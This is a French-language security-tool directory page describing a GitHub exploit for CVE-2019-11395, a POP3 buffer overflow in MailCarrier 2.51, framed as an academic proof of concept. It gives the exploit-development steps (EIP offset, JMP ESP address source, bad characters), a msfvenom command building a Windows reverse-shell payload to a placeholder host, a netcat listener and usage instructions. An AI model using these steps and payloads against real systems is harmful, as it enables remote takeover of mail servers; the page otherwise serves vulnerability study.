Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-11395 — Exploit Python pour CVE-2019-11395, un débordement de tampon dans le service POP3 de MailCarrier 2.51. Génère une charge utile de shell inversé via msfvenom et permet l'exécution de code à distance sur des cibles Windows. | Kitploit
Outils/GitHubGitHub/caioprince/cve-2019-11395
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeTests d'IntrusionExploitation de Binaires
GitHubcaioprince/cve-2019-11395

CVE-2019-11395

Exploit Python pour CVE-2019-11395, un débordement de tampon dans le service POP3 de MailCarrier 2.51. Génère une charge utile de shell inversé via msfvenom et permet l'exécution de code à distance sur des cibles Windows.

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit CVE-2019-11395 🛡️

À propos de CVE-2019-11395 🕵️

La vulnérabilité CVE-2019-11395 décrit une vulnérabilité de dépassement de tampon dans l'application de messagerie MailCarrier 2.51, permettant l'exécution de code à distance. La vulnérabilité se produit dans les processus SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, ou POP3 RETR.

Lors d'une étude académique, l'accent a été mis sur les processus POP3 pour créer une preuve de concept (PoC). Il a été identifié que l'envoi de 6000 octets à l'application l'empêche de fonctionner, révélant ainsi la vulnérabilité de dépassement de tampon.

Étapes d'exploitation 🔍

  1. Utilisé msf-pattern_create -l 6000 pour identifier précisément l'EIP.
  2. Identifié le décalage de l'EIP avec msf-pattern_offset -q 6E47386E -l 6000, résultant en un décalage de 5095.
  3. Identifié expsrv.dll avec ASLR désactivé, approprié pour un JMP ESP.
  4. Identifié les mauvais caractères \x00\x0a\x0d lors des tests de caractères invalides.
  • Généré le payload avec msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
  • Ajusté le code CVE-2019-11395.py pour accommoder le payload.
  • Ouvert la connexion avec nc -lnvp 4444 et exécuté l'exploit (CVE-2019-11395.py) pour obtenir l'accès à l'environnement et valider la CVE décrite.
  • Utilisation 🚀

    Suivez ces étapes pour utiliser l'exploit :

    1. Générez le payload en utilisant msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
    2. Copiez la sortie de la commande msfvenom.
    3. Ajustez le code CVE-2019-11395.py pour remplacer la variable shellcode par la sortie obtenue de la commande msfvenom.
    4. Exécutez l'exploit (CVE-2019-11395.py) pour obtenir l'accès à l'environnement et valider la CVE décrite.

    Environnement compromis 📸

    Preuve de concept CVE-2019-11395

    🔗 Connectez-vous avec moi

    Visitez mon profil sur LinkedIn

    Télécharger l’outil